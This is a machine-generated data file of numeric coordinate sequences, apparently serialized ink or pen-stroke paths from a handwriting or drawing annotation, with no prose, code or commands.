0,-1 0-1,8 9 1,-7-7-50,0-1 0,-1 1 0,1 0 0,-2 0 0,1 1 0,4 14 0,-7-18 23,-1 0-1,1 1 0,-1-1 0,0 0 0,-1 1 0,1-1 1,-1 1-1,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,-4 5 1,2-3 15,0 0 0,0 0 0,-1-1 0,0 0 1,0 0-1,-1 0 0,1 0 0,-1-1 0,0 0 1,0 0-1,-1 0 0,1 0 0,-1-1 0,0 0 1,-7 3-1,-11 3-195,-1-1 0,-41 8 0,13-3-1796,48-13 2591,-10 1-13252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2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55 152 944,'0'0'3518,"42"18"1509,-2-9-2774,-38-8-2140,1 0-1,-1 0 1,1 0 0,-1-1 0,1 1-1,-1 0 1,1-1 0,-1 0 0,1 0-1,-1 0 1,1 0 0,0 0 0,-1 0 0,1-1-1,-1 1 1,1-1 0,-1 1 0,1-1-1,-1 0 1,0 0 0,4-3 0,3 0-32,-1 0 0,0-1 0,-1-1 0,1 1 0,-1-1 0,0-1 0,-1 1 0,8-10 0,-13 14-43,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 1,0-1-1,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 0,0 1 0,-1-4 0,-11-14 807,12 17-796,1 0 0,-1 1 1,0-1-1,0 0 0,0 1 1,-1-1-1,1 1 1,0-1-1,0 1 0,-1-1 1,1 1-1,-1 0 0,1 0 1,-1 0-1,0 0 0,0 0 1,1 0-1,-1 0 1,0 0-1,-3 0 0,-12-3 360,0 0-1,0 2 1,0 0 0,-23 1-1,32 1-359,1 1-1,-1 0 0,0 1 1,1 0-1,0 0 1,-1 1-1,-6 3 0,11-6-41,1 1 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0-1,1 0 1,-1 0 0,1 1 0,0-1 0,0 0 0,-1 0 0,1 1 0,1-1 0,-2 3 0,-9 39 58,11-32-63,0-4 4,-1-1 1,2 0 0,-1 0-1,1 1 1,2 10-1,-2-17-7,-1 1-1,0-1 1,1 0-1,0 0 1,-1 1-1,1-1 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,1 0-1,-1-1 1,0 1-1,0 0 0,1-1 1,-1 1-1,0-1 1,1 0-1,-1 1 1,0-1-1,1 0 0,-1 0 1,0 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,0 0 0,3-1 1,9-2-4,-1 2 1,-1-1 0,1 0 0,0-1 1,-1-1-1,1 0 0,-1 0 0,0-1 0,12-8 1,12-4 19,-31 16-10,0 0 1,-1 0 0,1-1 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,4-4 0,12-4 38,-18 10-41,-1 0 1,1 0-1,-1 0 1,1-1-1,-1 1 1,0 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 1 1,0-1-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 1 1,-1-1-1,0 0 1,1 0-1,-1 1 1,0-1-1,1 0 1,-1 1-1,0-1 1,1 0-1,-1 1 1,0-1-1,0 1 1,1-1-1,-1 0 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,1 0-1,-1 1 1,0-1-1,0 1 1,0 0-1,12 9 30,-11-9-54,1-1 0,-1 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,1 1 1,-1 0-309,1 0 1,-1 0 0,1 0-1,0 0 1,0-1 0,0 1-1,0-1 1,0 1 0,0-1-1,1 0 1,-1 0 0,5 3 0,15 8-8085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13 396,'0'0'1693,"1"-12"6125,1 12-7515,0 1 0,0-1 0,0 0 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 1,1 0-1,-1 1 0,0-1 0,0 0 0,2 3 0,-1 0-80,0 0 0,0 1 0,1-2 0,-1 1 0,1 0 0,0 0 0,5 3 0,12 19 194,-17-22-411,1-1 1,0 1 0,0 0 0,0-1 0,0 0-1,1 0 1,-1 0 0,1-1 0,8 4 0,-7-3-82,3-5-10,-2-2 47,-1 1-78,-1 0 0,1 0 0,-1-1 1,0 0-1,0 0 0,8-8 1,28-31-392,-30 32 622,-10 15 34,-17 30 220,-2 1 58,9-12-141,-2-1 1,-18 29-1,-6 11 190,-28 75-102,54-109-547,6-17-2050,2-24-3534,7-1 1431,-3 9 2910,-1-7-1657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7 68,'0'-7'12284,"-20"27"-10030,-46 107 736,60-115-2851,1 0 0,0 0 0,1 0 0,1 1 1,0 0-1,0 0 0,1-1 0,1 2 1,0 18-1,3-21-121,-1 1 1,2-1 0,-1 0-1,1-1 1,1 1-1,0 0 1,0-1 0,8 11-1,-10-17-64,0-1 0,1 0 1,-1 0-1,1 0 0,0 0 0,0 0 0,0-1 1,0 1-1,0-1 0,1 0 0,-1 0 0,1 0 1,-1-1-1,1 1 0,0-1 0,0 0 0,0 0 1,0 0-1,6 1 0,-8-2-591,1-1-35,0 1 1,-1-1-1,1 1 0,-1-1 0,1 0 0,-1 0 1,1 0-1,-1-1 0,5-2 0,-6 4-113,10-14-4203,-10 3 2205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91 728,'1'2'302,"-1"0"1,0 0-1,0 0 1,1 0-1,-1 0 0,1 0 1,0 0-1,0-1 1,-1 1-1,1 0 0,0 0 1,1-1-1,0 3 1,25 17 526,-25-20-839,0 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 0,0 0 1,0-1-1,1 0 1,-1 0-1,0 1 0,0-1 1,0 0-1,0-1 0,1 1 1,-1 0-1,0-1 1,0 1-1,0-1 0,0 0 1,0 1-1,0-1 1,0 0-1,0 0 0,0-1 1,0 1-1,-1 0 0,3-2 1,15-14 15,5-8 63,-15 12 90,-8 11-21,1 0 1,-1 0 0,0-1 0,0 1 0,0 0-1,0-1 1,0 1 0,0-1 0,-1 1-1,1-1 1,-1 1 0,1-1 0,-1 0-1,0 1 1,0-1 0,-1-2 0,1 3 8,-1 0-1,1 0 1,-1 1 0,0-1 0,0 0 0,0 1-1,1-1 1,-2 0 0,1 1 0,0-1 0,0 1 0,0 0-1,-1-1 1,1 1 0,0 0 0,-1 0 0,1 0-1,-1 0 1,0 0 0,1 0 0,-1 0 0,0 1-1,1-1 1,-1 1 0,0-1 0,0 1 0,0 0 0,1-1-1,-1 1 1,0 0 0,0 0 0,-2 1 0,-1-2-29,1 1 1,-1 0 0,1 0 0,-1 0 0,1 1 0,-1 0 0,1 0 0,-1 0-1,1 0 1,-1 1 0,1 0 0,0 0 0,0 0 0,-5 3 0,-9 9-674,11-8 593,0-1 1,0 2 0,0-1 0,1 1 0,-6 7 0,3 4-3217,6 2-3569,3-15 4001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92 900,'-2'1'131,"1"-1"1,-1 1-1,0 0 0,0 0 1,1 0-1,-1 0 0,1 0 0,-1 0 1,1 1-1,-1-1 0,1 1 1,0-1-1,-1 0 0,1 1 1,0 0-1,0-1 0,0 1 0,0 0 1,1-1-1,-1 1 0,0 0 1,1 0-1,-1 0 0,1 0 0,0 0 1,0 0-1,-1 0 0,1-1 1,0 1-1,1 0 0,-1 0 1,0 0-1,0 0 0,1 0 0,-1 0 1,1 0-1,0-1 0,0 1 1,-1 0-1,3 2 0,1 8 62,-4-12-190,0 1 1,0-1 0,0 1-1,0-1 1,0 1-1,1-1 1,-1 1 0,0-1-1,0 1 1,0-1 0,0 1-1,1-1 1,-1 1-1,0-1 1,1 1 0,-1-1-1,0 1 1,1-1 0,-1 0-1,0 1 1,1-1-1,-1 0 1,1 1 0,-1-1-1,1 0 1,-1 1 0,1-1-1,19 13 100,-19-12-82,1 1 0,0-1 0,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 0 0,0 0 0,1 0-1,-1-1 1,0 1 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 0-1,1 0 1,-1 0 0,0-1 0,1 1 0,2-2 0,1 0 44,0-1-1,1 0 1,-1-1 0,-1 1 0,1-1 0,0-1 0,-1 1 0,0-1 0,0 1 0,0-2 0,-1 1-1,8-11 1,5-6 491,-15 19-331,-1 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,-1-1 0,1 1 0,0-7 0,-1 5-66,0 4-92,0 0 1,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0-1 1,0 1-1,0 1 1,-1-1 0,1 0-1,0 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 1 1,0-1-1,0 0 1,1 0-1,-2 0 1,-11-24 2161,11 23-2135,0 0-1,-1 0 1,1 0-1,-1 0 1,1 1-1,-1-1 1,1 0-1,-1 1 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 1-1,0 0 1,-5-1-1,2 1-28,2 0 7,-1 0 1,1 0-1,-1 0 0,1 1 1,0-1-1,-1 1 0,1 0 1,0 0-1,0 1 0,-1-1 0,1 1 1,-4 2-1,4-2-8,-25 17 262,27-18-317,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 1 0,0-1 1,0 1-1,0-1 0,0 1 1,0-1-1,0 1 0,1-1 0,-1 1 1,1 0-1,-1 2 0,-10 26-31,11-28 23,0-1-1,1 1 0,-1-1 0,1 1 0,-1-1 1,1 0-1,0 1 0,-1-1 0,1 0 0,0 1 1,0-1-1,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,1 0 0,-1 0 0,0 0 0,0 0 1,1-1-1,-1 1 0,1 0 0,-1-1 0,1 1 1,-1-1-1,0 0 0,1 1 0,-1-1 0,1 0 1,0 0-1,-1 0 0,1 0 0,-1 0 0,1 0 1,1-1-1,68-7 22,-65 6-32,-3 1 11,1 0-1,-1 1 0,0-1 1,0 1-1,1-1 0,-1 1 0,0 0 1,1 0-1,-1 0 0,6 2 1,1-1-21,-6 0 5,0-1-1,0 1 1,-1 0-1,1 0 0,0 1 1,-1-1-1,1 1 1,-1 0-1,4 2 1,-3-2 59,-1 0 0,1 0-1,0 0 1,0 0 0,0-1 0,0 0 0,0 0 0,0 0 0,6 1 0,-9-2-77,1 1 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,1 2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41 204,'0'-1'2559,"0"2"-1685,0-7 1743,1 7-2491,-1-1 1,0 0 0,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0 0 1,0 1 0,0-1-1,0 1 1,0-1-1,0 0 1,0 1 0,0-1-1,0 0 1,0 1-1,0-1 1,0 0-1,0 1 1,0-1 0,-1 0-1,1 1 1,0-1-1,0 0 1,0 1-1,-1-1 1,1 0 0,0 0-1,0 1 1,-1-1-1,1 0 1,0 0-1,-1 0 1,1 1 0,0-1-1,-1 0 1,1 0-1,0 0 1,-1 0-1,1 0 1,0 0 0,-1 1-1,1-1 1,0 0-1,-1 0 1,1 0-1,0 0 1,-1 0 0,0-1-1,-13 15 831,-16 16-580,21-19-210,5 6 128,3-16-262,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0-1,-1 0 1,0 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,1 1 0,0-1-1,0 0 1,0 0 0,0 1 0,0-1 0,0 2 0,8 40 406,-2-10-376,-6-31-62,0-1 0,0 0 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0-1,-1 1 1,1-1 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,2 1 0,0-1 8,-1 0-1,1-1 1,0 1-1,-1-1 1,1 1-1,-1-1 1,1 0 0,0 0-1,-1 0 1,1 0-1,0 0 1,2-1 0,7-2 63,-1 0 1,0 0 0,0-2 0,0 1-1,12-8 1,-18 10-61,0-1 1,0 0-1,0-1 0,-1 1 1,0-1-1,1 0 0,-1 0 0,0 0 1,-1 0-1,1-1 0,-1 1 0,0-1 1,0 0-1,0 0 0,-1-1 1,1 1-1,-1 0 0,-1-1 0,1 1 1,-1-1-1,0 0 0,0 1 0,-1-1 1,1 0-1,-1 1 0,-1-1 1,1 0-1,-1 0 0,0 1 0,0-1 1,-1 1-1,1-1 0,-5-8 1,4 10 31,0 0 1,-1 1 0,1-1 0,-1 1 0,0 0 0,0 0-1,0 0 1,0 0 0,0 1 0,-1-1 0,1 1 0,-1 0-1,0 0 1,1 0 0,-1 1 0,0-1 0,0 1 0,0 0 0,0 0-1,-7-1 1,5 1-25,-1 0 0,1 1-1,-1 0 1,1 0 0,-1 0-1,1 1 1,-1 0 0,1 0-1,0 0 1,-1 1 0,1 0-1,-10 5 1,-3 3-26,15-8-54,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,1 0 0,-1 0 1,-3 5-1,-19 15-1837,12-12-1274,0 3-5617,5-8 5656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3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3 180,'0'0'106,"0"-1"-1,0 1 1,-1 0-1,1 0 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,-1 0 0,1 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0 0,0-1-1,0 1 1,0 0-1,-1 0 1,1 0-1,0 0 1,0 0-1,0 0 1,0 0-1,-1 1 1,1-1 0,0 0-1,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0 0,-1 1-1,1-1 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 1-1,0-1 1,0 0 0,-1 0-1,1 1 1,-12 4 2663,-1 24 259,24 2 773,0-1-2901,-10-26-830,0 0 0,1 0 0,-1-1 0,1 1 1,0 0-1,0-1 0,1 1 0,3 4 0,8 15 314,-8-15-268,0-1 0,0 0 0,1-1 0,0 0 0,13 10 0,0 0 86,29 17 235,-42-30-394,0 1 0,-1 0 0,0 0-1,0 0 1,0 1 0,6 6-1,-1 0-13,2 0 0,-1-1 0,18 11 0,11 10-14,12 6-160,-36-27-1007,-16-10 668,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,2-1 0,-1-9-2992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28 509 564,'-11'7'4311,"9"1"-4953,-12-12 10709,20 6-6031,-7-4-3957,1 1 1,0 0 0,-1 0 0,1-1-1,0 1 1,0 0 0,0 0 0,0-1-1,0 1 1,1 0 0,-1 0-1,0-1 1,0 1 0,1 0 0,-1 0-1,1 0 1,-1 0 0,1-1 0,0 1-1,-1 0 1,1 0 0,0 0-1,1-1 1,1-5 76,-2 4-152,-1 0-1,1 0 1,-1 0-1,1 0 1,0 0-1,0 1 1,0-1-1,1 0 1,-1 0 0,1 1-1,-1-1 1,1 1-1,0-1 1,0 1-1,0 0 1,3-3-1,1-1 21,17-26 87,20-13 185,-36 36-280,1 0 1,0 0 0,1 1 0,0 0 0,0 0-1,17-10 1,60-36-27,65-43 91,-112 72-39,-30 17-22,1 2 0,1-1 0,-1 2 0,1-1 0,17-5 0,5-7-1,-9 7-18,-20 9 1,-1 1-1,0-1 1,1 0-1,-1 1 1,1 0 0,0 0-1,-1 0 1,1 0-1,4 1 1,100-13 47,161 1-149,-163 24 236,-86-10-58,0 1 1,0 0-1,0 2 1,-1 0-1,25 10 1,9 2-136,6-2 87,53 17 59,-95-25-61,14 4 134,39 21 1,-5 20-83,-63-50-73,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0-1,-1 1 1,1-1 0,-1 1 0,0-1 0,1 1 0,-1 0 0,0 3-1,30 24 24,-28-26-13,0 0-1,1 0 1,0 0-1,0 0 1,0-1-1,6 5 1,12 11 140,-20-17-131,1 1 2,0-1 0,-1 1 0,1 0 1,0 1-1,-1-1 0,0 0 0,0 1 1,0 0-1,0-1 0,0 1 0,-1 0 1,0 0-1,0 0 0,0 0 0,1 7 0,-1-11-22,-1 1-1,1-1 1,-1 0-1,1 1 1,0-1-1,-1 1 1,1-1-1,-1 1 0,1-1 1,-1 1-1,1-1 1,-1 1-1,1-1 1,-1 1-1,0-1 1,1 1-1,-1 0 0,0-1 1,1 1-1,-1 0 1,0-1-1,0 1 1,0 0-1,1 0 0,-1 1 4,0-2-3,-1 0-1,1 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 1,0-1-1,0 0 0,0 1 0,0-1 1,1 0-1,-1 1 0,0-1 1,0 0-1,0 1 0,0-1 0,0 0 1,0 0-1,1 1 0,-1-1 0,0 0 1,0 1-1,1-1 0,-1 0 1,0 0-1,0 1 0,1-1 0,-1 0 1,0 0-1,1 0 0,-1 0 1,0 1-1,0-1 0,1 0 0,-1 0 1,0 0-1,1 0 0,-1 0 0,0 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,0 0 0,1 0 0,-1 0 1,0 0-1,1 0 0,-1-1 0,0 0-210,0 1 139,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,-1 1-1,1 0 1,0-1-1,0 1 1,0-1-1,-1 1 1,1 0-1,0-1 1,-1 1-1,1 0 1,0-1-1,-1 1 1,1 0 0,0-1-1,-1 1 1,1 0-1,0 0 1,-1-1-1,1 1 1,-1 0-1,1 0 1,-1 0-1,1 0 1,0-1-1,-1 1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,0 0-1,-22-8-6540,5-1-808,7 8 3549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1 283 936,'0'-1'278,"0"0"0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 1,-1 0-1,0 0 0,1 1 0,-1-1 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,0 1 0,0 0 0,0-1 0,1 1 0,1-2 139,-1 0 401,-1 2-636,0-1-1,-1 0 0,1 1 1,0-1-1,0 0 1,0 1-1,0-1 0,0 1 1,-1-1-1,1 1 1,0 0-1,0-1 1,0 1-1,0 0 0,0-1 1,0 1-1,0 0 1,1 0-1,-1 0 0,0 0 1,0 0-1,0 0 1,0 1-1,0-1 0,0 0 1,0 0-1,0 1 1,1-1-1,34 8 1595,12 7-1255,-33-10-418,1 0 0,0 0 0,0-2 1,1 0-1,27 2 0,6-3 50,-31-1-68,0 0 0,33-4 0,21-3 44,-59 6 4,0 0 0,0-1 0,0-1 0,0 0 0,0-1 0,0-1 0,-1 0 0,1-1 0,13-6 0,-20 6-40,-1 0 1,1-1 0,-1 1-1,0-1 1,-1 0-1,0-1 1,0 1 0,0-1-1,0 0 1,-1 0 0,-1-1-1,1 1 1,-1-1-1,3-11 1,0-5 109,-5 21-193,0 1-1,0 0 1,0-1 0,-1 1-1,1 0 1,-1-1-1,1 1 1,-1-1-1,0 1 1,0-1 0,0 1-1,0-1 1,-1 1-1,1-1 1,-2-3 0,-4-22 32,5 24-47,1 1 0,-1-1 0,1 0 0,-1 0-1,0 0 1,-1 1 0,1-1 0,-1 0 0,1 1-1,-1-1 1,0 1 0,0 0 0,-5-5 0,7 8-24,0-1 1,0 1-1,-1 0 1,1-1-1,0 1 0,0 0 1,-1-1-1,1 1 1,0 0-1,-1 0 1,1 0-1,0-1 1,-1 1-1,1 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,1-1-1,0 1 0,-1 0 1,1 0-1,-1 1 1,1-1-1,0 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1 1-1,-1-1 1,1 0-1,0 0 1,-1 1-1,1-1 0,-1 1 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4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1875 0 4,'0'0'2246,"9"6"2859,-9-6-5014,0 0 0,0 0-1,-1 0 1,1 0 0,0 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,0-1 0,-1 1-1,1 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0 1-1,0-1 1,-1 0 0,1 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 1 1,-1-1-1,1 0 1,0 0 0,0 0-1,0 0 1,-1 1 0,1-1-1,0 0 1,0 0 0,0 0-1,0 1 1,0-1 0,0 0-1,-1 0 1,1 1 0,0-1-1,0 0 1,0 0 0,0 1-1,0-1 1,0 0 0,0 1-3,0 0 1,0-1-1,0 1 0,0-1 1,0 1-1,0-1 1,-1 1-1,1-1 0,0 1 1,0-1-1,0 1 1,-1-1-1,1 1 1,0-1-1,-1 1 0,1-1 1,0 0-1,-1 1 1,1-1-1,-1 1 0,1-1 1,-1 0-1,1 0 1,0 1-1,-1-1 0,1 0 1,-2 1-1,-10 24 1556,10-21-1558,0-1-1,0 1 1,0-1-1,0 0 1,0 0-1,-1 0 1,0 0-1,1 0 1,-1 0-1,-5 3 1,-37 29 320,38-30-243,-1 0 1,1 0-1,0 1 1,-13 13-1,-6 6 69,-93 66 856,92-69-688,-2-2 0,-53 29 0,78-47-367,-18 13 187,18-12-127,-1 0-1,0 1 1,0-2 0,0 1 0,-11 4 0,0-3-51,0 2 1,1 0-1,-25 13 1,-44 30 572,68-39-563,10-6-43,-1 1 1,0-2-1,0 1 1,0-1 0,0 0-1,0 0 1,-1-1-1,-10 3 1,0 2 22,15-5-31,1-1-1,-1 0 1,0 1 0,1-1 0,-1 0-1,0-1 1,0 1 0,1 0 0,-1-1-1,-4 1 1,-58 22-26,45-16 64,12-4-13,0-1 0,0 0 0,0 0 0,-15 1 0,-72 16 531,93-19-503,-32-1 43,26-2-88,0 1 0,0 1 1,-1-1-1,1 2 0,0-1 0,0 1 0,-1 0 1,-12 2-1,-9 0 205,27-3-154,0 1-1,0-1 0,0 0 0,0 1 0,0-1 0,0-1 1,0 1-1,0 0 0,-3-3 0,3 3-26,-1-1-1,1 0 1,-1 0-1,1 1 1,-1 0-1,0 0 1,0 0-1,0 0 1,-5 0-1,-4-1-20,0-1-1,0-1 1,1 0-1,-14-7 1,25 11-12,1-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 1 1,1-1-1,-1 1 0,1 0 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1-1 1,-1 1-1,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 1,1 0-1,-1 1 0,1-1 0,-2 0 0,0-1 4,-7-5 0,1 0-1,-1 0 0,0 1 1,-1 0-1,1 1 0,-13-4 1,-62-12-117,82 20 86,2 0 31,0-1 1,0 1 0,-1 0 0,1-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,-1 1-1,1 0 1,0-1 0,-1 1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0 0 0,-1 0-1,1 0 1,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,-17-6 75,12 3-86,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1 1 0,0-1 0,1 1 0,-12-1 0,15 1 1,-6-3 7,-11-1-1,19 5-1,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0-1 1,0 1-1,0 0 0,0-1 0,1 1 0,-1-1 0,0 0 0,0 1 0,1-1 0,-1 1 1,0-1-1,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1-1 0,-23-11 522,23 13-516,-1 0 0,0 0 0,0-1 1,1 1-1,-1 0 0,0 0 0,1-1 1,-1 1-1,1-1 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-1 0 0,1 0 1,-2-1-1,-8-6 208,5-1 146,6 8-359,1 1 1,-1 0 0,0 0-1,0 0 1,0-1 0,0 1 0,0 0-1,0 0 1,0 0 0,0-1-1,0 1 1,0 0 0,0 0-1,-1 0 1,1 0 0,0-1 0,0 1-1,0 0 1,0 0 0,0 0-1,0 0 1,0-1 0,0 1-1,0 0 1,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,0-1-1,0 1 1,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0 0-1,0 0 1,0 0 0,-1 0 0,1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 1-1,0-1 1,0 0 0,0 0 0,-1 0-1,1 0 1,0-10 100,-7 5-75,7 5-35,-1-1 1,1 1-1,0-1 1,0 1-1,-1 0 1,1-1-1,0 1 1,-1-1-1,1 1 1,0 0 0,-1-1-1,1 1 1,-1 0-1,1-1 1,-1 1-1,1 0 1,0 0-1,-1-1 1,1 1-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,0 0 1,0 2-345,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,-2 1 0,-37 24-9590,32-21 7775,-4 2-1658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5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2 378 568,'0'7'11576,"0"-8"-10713,0 1-795,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 1 1,0 0-1,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 1,-1-1-1,0 1 0,1 0 0,-1 0 0,0 0 0,1 0 0,1-1 641,-9-4-464,6 2-117,0-1 0,0 1 0,1 0 0,0-1 0,-1 1 0,1-1 0,0 1 0,2-6 0,-2-2 9,11-45-25,-1-5 486,-10-23 606,20 67-620,-7-14-92,-13 31-489,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0 0 1,1-1-1,-1 1 1,0-1-1,0 1 1,1-1-1,-1 1 1,0 0-1,0-1 1,1 1-1,-1 0 1,1-1-1,-1 1 1,0 0-1,1-1 1,5-10 393,-6 10-56,-2-28 1034,-4 27-847,15 10-200,0-6-300,-1 0 0,0 0 0,1 0 0,-1-1-1,1-1 1,0 0 0,-1 0 0,1 0-1,-1-1 1,17-3 0,25-1 15,-9 3 33,-1-2 1,56-12-1,-88 14-90,48 0-126,-55 2-31,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,1 0 1,0 1 0,-1-1-1,0 1 1,1-1-1,-1 1 1,1-1 0,-1 1-1,1 0 1,-1 0-1,0-1 1,0 1 0,1 0-1,-1 0 1,0 0-1,0 0 1,0 1 0,0-1-1,0 0 1,0 0-1,-1 1 1,1-1 0,0 0-1,0 4 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1 516,'0'0'992,"-31"35"2399,21-5-2623,-3 3-191,-19 50 1184,28-78-1539,2 0 0,-1 1 1,0-1-1,1 1 0,0 0 1,0 0-1,0 6 0,-9 22 1132,10-28-1066,0 0-1,0 0 1,0 0-1,1 0 1,-1-1 0,2 1-1,0 11 1,0 4 382,0-18-611,-1 0 0,1 0-1,0 0 1,-1 0 0,1 0 0,1-1 0,-1 1 0,0 0-1,1-1 1,-1 1 0,1-1 0,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,0 0 0,1 0 0,-1 0 0,1 0-1,-1-1 1,1 0 0,-1 1 0,1-1 0,0 0 0,0 0-1,0 0 1,0-1 0,0 1 0,0-1 0,3 1 0,7 1 66,0-1 1,0 0-1,0 0 1,0-2-1,1 1 1,15-4 0,-3-1-725,52-3 1,-76 8-404,-24-7-9516,11 2 7709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44,'22'-19'6814,"-22"8"-6203,1 11-537,-1 0-1,0-1 1,0 1-1,0 0 0,0 0 1,0 0-1,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0 0 1,0 0-1,0-1 0,0 1 1,0 0-1,0 0 1,0 0-1,0 0 0,0-1 1,0 1-1,0 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 1,0 0-1,0 0 0,0 0 1,0 0-1,-1 0 0,1-1 1,0 1-1,0 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 1,0 0-1,-1 0 0,1 0 1,0 0-1,0 0 1,0 0-1,-1 0 0,1 0 1,0 1-1,0-1 1,0 0-1,-1 0 0,-5 0 498,8 37 2687,0-33-3173,-1 0-1,0 1 0,0-1 1,0 0-1,0 0 0,0 0 1,-1 1-1,0-1 1,0 6-1,-1-7-62,1 0 1,0 1-1,0-1 1,0 0-1,1 1 1,-1-1-1,1 0 1,0 0-1,0 1 0,0-1 1,0 0-1,0 0 1,3 3-1,7 37 203,-11-43-224,1 1 0,-1 0 1,1-1-1,-1 1 0,1 0 0,-1-1 1,0 1-1,1 0 0,-1 0 0,0-1 1,0 1-1,0 0 0,1 0 0,-1-1 1,0 1-1,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,-1 1 0,1-1-1,0-1 0,0 1 0,0-1-1,0 0 1,0 1 